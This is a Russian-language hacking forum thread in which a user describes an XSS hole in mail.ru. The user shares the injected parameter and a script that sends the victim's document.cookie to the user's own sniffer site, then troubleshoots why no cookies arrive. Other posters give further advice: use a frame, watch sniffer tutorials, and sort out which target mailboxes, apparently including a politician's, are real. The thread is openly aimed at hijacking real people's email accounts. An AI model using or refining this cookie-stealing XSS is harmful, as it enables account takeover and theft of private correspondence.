![]() |
Жириновский настоящий насчет медведя не знаю да и не стоит туда лезть не по зубам тебе эти акк там спец защита небось .Насчет сниффа попробуй со свой почты залезть придут куки или нет.И еще зделай все через фрейм а то все как то покривому скорее у тебя куки приходятс твоего сайта
|
1. У меня есть уязвимость xss mail.ru, ?inf=">alert('OK')
2. В index.html вот ...?inf="> 3. В xss.js вот img = new Image(); img.src = "http://мой сайт/jpg/s.jpg?"+document.cookie; Сниффер свой. Проблема вот с чем, посылаю письмо, переходит на уязвимую страницу и все, cookies нет. Проблема думаю в 3., только незнаю как исправить. Кто может, помогите. Еще вот: Скрытый текст (вы должны быть авторизованы и иметь 15 сообщений): У вас нет прав чтобы видеть скрытый текст, который находится здесь Это настоящие почтовые ящики ... или нет? |
Они у меня вообще не приходят.
Все стопорится на уязвимости, открывается страница сайта с уязв. и все, а по идее должно проскочить и перекинуть на сайт который я прописал. ............... Все разобрался. |
там где вход в сниффер видео,посмотри и здесь на форуме тоже видео есть
для новичков там тоже посмотри.знать больше по снифферу будешь. а по части ящиков посмотри "мой мир",ящиков. |
| Время: 00:27 |